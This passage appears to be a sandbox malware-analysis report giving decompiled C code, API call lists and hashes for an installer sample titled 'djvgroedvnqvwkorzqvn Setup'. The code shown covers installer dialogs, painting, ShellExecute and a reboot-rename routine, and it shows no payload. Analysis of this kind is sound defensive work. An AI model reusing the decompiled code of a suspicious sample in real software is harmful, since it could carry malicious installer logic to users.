							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403FD9(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f540, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42400c - _t133;
							if( *0x42400c == _t133) {
								_push( *0x420578);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f540);
							}
							E00403FEC();
							E00405CFB(0x420580, "djvgroedvnqvwkorzqvn Setup");
							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420580);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423758);
									 *0x41fd50 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423758 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FB7(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42374c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423758, 8);
									E00404003(0x405);
									goto L58;
								}
								__eflags =  *0x42400c - _t133;
								if( *0x42400c != _t133) {
									goto L61;
								}
								__eflags =  *0x424000 - _t133;
								if( *0x424000 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423758);
						 *0x423f88 = _t133;
						EndDialog(_t125,  *0x41f948);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423758, 0x40f, 0, 1);
						__eflags =  *0x42374c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E0040401E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423758, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42400c - _t133;
										if( *0x42400c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f948 = 1;
											L21:
											_push(0x78);
											L22:
											E00403F90();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f948 = _t127;
										goto L21;
									}
									__eflags =  *0x4091e8 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423758);
						 *0x423758 = _a12;
						L58:
						_t141 =  *0x421580 - _t133; // 0x0
						if(_t141 == 0) {
							_t142 =  *0x423758 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421580 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                          0x00403aed
                          0x00403af6
                          0x00403c37
                          0x00403c3b
                          0x00403c3f
                          0x00403c41
                          0x00403c46
                          0x00403c51
                          0x00403c5c
                          0x00403c61
                          0x00403c63
                          0x00403c65
                          0x00403c68
                          0x00403c6d
                          0x00403c7b
                          0x00403c88
                          0x00403c8f
                          0x00403c8f
                          0x00403c90
                          0x00403c90
                          0x00403c95
                          0x00403c9b
                          0x00403ca2
                          0x00403ca8
                          0x00403caa
                          0x00403cea
                          0x00403cef
                          0x00403cf4
                          0x00403cf4
                          0x00403cf9
                          0x00403d02
                          0x00403d04
                          0x00403d09
                          0x00403d0f
                          0x00403d13
                          0x00403d13
                          0x00403d18
                          0x00403d1e
                          0x00000000
                          0x00000000
                          0x00403d24
                          0x00403d29
                          0x00403d2f
                          0x00000000
                          0x00000000
                          0x00403d38
                          0x00403d40
                          0x00403d45
                          0x00403d48
                          0x00403d4e
                          0x00403d53
                          0x00403d56
                          0x00403d5c
                          0x00403d61
                          0x00403d64
                          0x00403d6a
                          0x00403d72
                          0x00403d78
                          0x00403d7e
                          0x00403d82
                          0x00403d89
                          0x00403d89
                          0x00403d89
                          0x00403d93
                          0x00403da5
                          0x00403db1
                          0x00403db6
                          0x00403dc0
                          0x00403dc6
                          0x00403dc8
                          0x00403dcd
                          0x00403dca
                          0x00403dca
                          0x00403dca
                          0x00403ddd
                          0x00403df5
                          0x00403df7
                          0x00403dfd
                          0x00403e12
                          0x00403dff
                          0x00403e08
                          0x00403e0a
                          0x00403e0a
                          0x00403e18
                          0x00403e28
                          0x00403e39
                          0x00403e40
                          0x00403e46
                          0x00403e4a
                          0x00403e4f
                          0x00403e51
                          0x00000000
                          0x00403e57
                          0x00403e57
                          0x00403e59
                          0x00000000
                          0x00000000
                          0x00403e5f
                          0x00403e63
                          0x00403e88
                          0x00403e8e
                          0x00403e94
                          0x00403e96
                          0x00000000
                          0x00000000
                          0x00403ebc
                          0x00403ec2
                          0x00403ec4
                          0x00403ec9
                          0x00000000
                          0x00000000
                          0x00403ecf
                          0x00403ed2
                          0x00403ed5
                          0x00403eec
                          0x00403ef8
                          0x00403f11
                          0x00403f17
                          0x00403f1b
                          0x00403f20
                          0x00403f26
                          0x00000000
                          0x00000000
                          0x00403f30
                          0x00403f3b
                          0x00000000
                          0x00403f3b
                          0x00403e65
                          0x00403e6b
                          0x00000000
                          0x00000000
                          0x00403e71
                          0x00403e77
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e7d
                          0x00403e51
                          0x00403f48
                          0x00403f54
                          0x00403f5b
                          0x00000000
                          0x00403cac
                          0x00403cac
                          0x00403caf
                          0x00403ce2
                          0x00403ce2
                          0x00403ce4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403ce4
                          0x00403cb1
                          0x00403cb5
                          0x00403cba
                          0x00403cbc
                          0x00000000
                          0x00000000
                          0x00403ccc
                          0x00403cd4
                          0x00000000
                          0x00403cda
                          0x00403b08
                          0x00403b08
                          0x00403b0c
                          0x00403b11
                          0x00403b20
                          0x00403b20
                          0x00403b29
                          0x00403b32
                          0x00403b3d
                          0x00403b3d
                          0x00403b49
                          0x00403b65
                          0x00403b68
                          0x00403b7b
                          0x00403b81
                          0x00403c24
                          0x00000000
                          0x00403c2d
                          0x00403b87
                          0x00403b94
                          0x00403b96
                          0x00403b98
                          0x00403bb7
                          0x00403bb7
                          0x00403bba
                          0x00403bbf
                          0x00403bc2
                          0x00403bd2
                          0x00403bd3
                          0x00403bd5
                          0x00403c0b
                          0x00403c1e
                          0x00000000
                          0x00403c1e
                          0x00403bd7
                          0x00403bdd
                          0x00403bf6
                          0x00403bfb
                          0x00403bfd
                          0x00000000
                          0x00000000
                          0x00403bff
                          0x00403beb
                          0x00403beb
                          0x00403bed
                          0x00403bed
                          0x00000000
                          0x00403bed
                          0x00403be0
                          0x00403be5
                          0x00000000
                          0x00403be5
                          0x00403bc4
                          0x00403bca
                          0x00000000
                          0x00000000
                          0x00403bcc
                          0x00000000
                          0x00403bcc
                          0x00403bbc
                          0x00000000
                          0x00403bbc
                          0x00403ba2
                          0x00403ba9
                          0x00403baf
                          0x00403bb1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403bb1
                          0x00403b6d
                          0x00000000
                          0x00403b4b
                          0x00403b51
                          0x00403b5b
                          0x00403f61
                          0x00403f61
                          0x00403f67
                          0x00403f69
                          0x00403f6f
                          0x00403f74
                          0x00403f7a
                          0x00403f7a
                          0x00403f6f
                          0x00403f84
                          0x00000000
                          0x00403f84
                          0x00403b49

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                          • ShowWindow.USER32(?), ref: 00403B3D
                          • DestroyWindow.USER32 ref: 00403B51
                          • SetWindowLongA.USER32 ref: 00403B6D
                          • GetDlgItem.USER32 ref: 00403B8E
                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                          • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                          • GetDlgItem.USER32 ref: 00403C57
                          • GetDlgItem.USER32 ref: 00403C61
                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                          • GetDlgItem.USER32 ref: 00403D72
                          • ShowWindow.USER32(00000000,?), ref: 00403D93
                          • EnableWindow.USER32(?,?), ref: 00403DA5
                          • EnableWindow.USER32(?,?), ref: 00403DC0
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                          • EnableMenuItem.USER32 ref: 00403DDD
                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
                          • lstrlenA.KERNEL32(00420580,?,00420580,djvgroedvnqvwkorzqvn Setup), ref: 00403E31
                          • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                          • ShowWindow.USER32(?,0000000A), ref: 00403F74
                          Strings
                          • djvgroedvnqvwkorzqvn Setup, xrefs: 00403E22
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: djvgroedvnqvwkorzqvn Setup
                          • API String ID: 184305955-3687411916
                          • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                          • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                          • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                          • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040FF Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420560 =  *0x420560 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040401E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422f20
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f88, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f88, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd50 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040438A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42375c; // 0x5c191b
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423fb8; // 0x5c11e0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040CB;
				E00403FB7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FB7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403FEC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f90; // 0x5bf9f8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f544 =  *0x41f544 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420560 =  *0x420560 & 0x00000000;
				return 0;
			}




















                          0x0040410f
                          0x00404235
                          0x00404291
                          0x00404295
                          0x0040436c
                          0x0040436e
                          0x0040436e
                          0x00404374
                          0x00404374
                          0x00404377
                          0x00000000
                          0x0040437e
                          0x004042a3
                          0x004042a5
                          0x004042af
                          0x004042ba
                          0x004042bd
                          0x004042c0
                          0x004042cb
                          0x004042ce
                          0x004042d5
                          0x004042e3
                          0x004042fb
                          0x00404303
                          0x0040430e
                          0x0040431e
                          0x00404320
                          0x00404320
                          0x004042d5
                          0x0040432a
                          0x00000000
                          0x00404335
                          0x00404339
                          0x0040434a
                          0x0040434a
                          0x00404350
                          0x0040435e
                          0x0040435e
                          0x00000000
                          0x00404362
                          0x0040432a
                          0x00404240
                          0x00000000
                          0x00404254
                          0x0040425a
                          0x00404260
                          0x00000000
                          0x00000000
                          0x00404285
                          0x00404287
                          0x0040428c
                          0x00000000
                          0x0040428c
                          0x00404240
                          0x00404115
                          0x00404118
                          0x0040411d
                          0x0040411f
                          0x0040412e
                          0x0040412e
                          0x00404130
                          0x00404135
                          0x00404138
                          0x0040413a
                          0x0040413f
                          0x00404148
                          0x0040414e
                          0x0040415a
                          0x0040415d
                          0x00404166
                          0x0040416b
                          0x0040416e
                          0x00404173
                          0x0040418a
                          0x00404191
                          0x004041a4
                          0x004041a7
                          0x004041bc
                          0x004041be
                          0x004041c3
                          0x004041c8
                          0x004041cd
                          0x004041cd
                          0x004041dc
                          0x004041eb
                          0x004041ed
                          0x00404203
                          0x00404212
                          0x00404214
                          0x00000000

                          APIs
                          • CheckDlgButton.USER32 ref: 0040418A
                          • GetDlgItem.USER32 ref: 0040419E
                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
                          • GetSysColor.USER32(?), ref: 004041CD
                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
                          • lstrlenA.KERNEL32(?), ref: 004041F5
                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
                          • GetDlgItem.USER32 ref: 00404275
                          • SendMessageA.USER32(00000000), ref: 00404278
                          • GetDlgItem.USER32 ref: 004042A3
                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
                          • LoadCursorA.USER32 ref: 004042F2
                          • SetCursor.USER32(00000000), ref: 004042FB
                          • ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
                          • LoadCursorA.USER32 ref: 0040431B
                          • SetCursor.USER32(00000000), ref: 0040431E
                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: /B$N$open
                          • API String ID: 3615053054-636633259
                          • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                          • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                          • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                          • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90; // 0x5bf9f8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "djvgroedvnqvwkorzqvn Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f88; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                          0x0040100a
                          0x00401039
                          0x00401047
                          0x0040104d
                          0x00401051
                          0x0040105b
                          0x00401061
                          0x00401064
                          0x004010f3
                          0x00401089
                          0x0040108c
                          0x004010a6
                          0x004010bd
                          0x004010cc
                          0x004010cf
                          0x004010d5
                          0x004010d9
                          0x004010e4
                          0x004010ed
                          0x004010ef
                          0x004010ef
                          0x00401100
                          0x00401105
                          0x0040110d
                          0x00401110
                          0x00401112
                          0x00401118
                          0x0040111f
                          0x00401126
                          0x00401130
                          0x00401142
                          0x00401156
                          0x00401160
                          0x00401165
                          0x00401165
                          0x00401110
                          0x0040116e
                          0x00000000
                          0x00401178
                          0x00401010
                          0x00401013
                          0x00401015
                          0x00401019
                          0x0040101f
                          0x0040101f
                          0x00000000

                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32 ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32 ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,djvgroedvnqvwkorzqvn Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$djvgroedvnqvwkorzqvn Setup
                          • API String ID: 941294808-1094634998
                          • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                          • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                          • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                          • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t18 =  *0x423f90; // 0x5bf9f8
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
